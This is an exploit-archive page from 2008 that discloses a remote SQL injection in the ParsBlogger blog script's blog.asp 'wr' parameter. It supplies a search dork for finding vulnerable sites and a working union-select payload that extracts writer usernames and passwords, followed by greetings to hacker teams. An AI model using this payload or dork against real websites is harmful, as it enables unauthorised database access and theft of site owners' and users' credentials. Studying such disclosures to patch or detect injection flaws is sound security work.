[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ParsBlogger (blog.asp wr) Remote SQL Injection Vulnerability
# Published : 2008-11-26
# Author : BorN To K!LL
# Previous Title : Post Affiliate Pro v.3 (umprof_status) Blind SQL Injection Vulnerability
# Next Title : Star Articles 6.0 Remote Blind SQL Injection Vulnerability


--------------------------------------------------------------------------------------------------------------------

[~] Script   : ParsBlogger

[~] Version  : >!<

[~] Link       : http://www.parsblogger.com

[~] Dork      : "Powered by ParsBlogger"

[~] Author   : BorN To K!LL

[~] TeaM     : Security Geeks [ Sec-Geeks.com ]

--------------------------------------------------------------------------------------------------------------------

[~] Exploit :.

site.ir/blog.asp?wr=[SQL]

[~] Example :.

site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer--

--------------------------------------------------------------------------------------------------------------------

[~] Greetings :.

[ ??r ?|??CD??£?“ ] , [ SECURITY G?£?£KS ] , [ AsbMay's Group ] , [ w4ck1ng TeaM ] , [ darkc0de TeaM ] , [ Juba ] .. n all muslims

--------------------------------------------------------------------------------------------------------------------

# www.Syue.com [2008-11-26]